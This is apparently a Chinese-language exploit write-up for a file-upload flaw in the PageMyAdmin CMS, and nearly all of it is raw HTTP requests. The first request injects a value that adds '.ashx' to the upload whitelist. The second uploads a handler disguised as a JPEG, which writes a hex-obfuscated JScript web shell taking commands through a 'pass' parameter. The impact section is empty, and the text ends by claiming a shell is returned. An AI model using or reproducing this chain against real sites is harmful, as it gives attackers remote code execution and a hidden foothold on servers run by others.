跳转至

PageMyAdmin文件上传getshell

一、漏洞简介

二、漏洞影响

三、复现过程

先set增加ashx白名单->

POST /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://url/e/aspx/upload.aspx?a=pageadmin_cms
Host: 127.0.0.1
Content-Length: 106
Connection: Keep-Alive

submit=1&swf_upload=2&table=pa_field&field=file_ext=".jpg,.jpeg,.gif,.bmp,.ashx"  where id=174 and max_num

返回包

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Sat, 13 Jul 2019 07:52:02 GMT

<script type='text/javascript'>location.href='?result=cs_error'</script>

第二步

在上传ashx->

POST /e/aspx/upload.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzBItOAbA8GrZ7s49
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://url/e/aspx/upload_p ... pic&from=master
Host: 127.0.0.1
Content-Length: 2318


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="file"; filename="005.ashx"
Content-Type: image/jpeg

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
    public void ProcessRequest(HttpContext context)
    {
        byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
        try
        {
            File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
            context.Response.Write("oooooooookkkkkkkkk");
        }
        catch(Exception ex)
        {
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }
}
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="width"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="height"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="url"


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="filesize"

0
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="sid"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="type"

file
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="table"

article
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="field"

titlepic
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="from"

master
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49--

发送第二步返回shell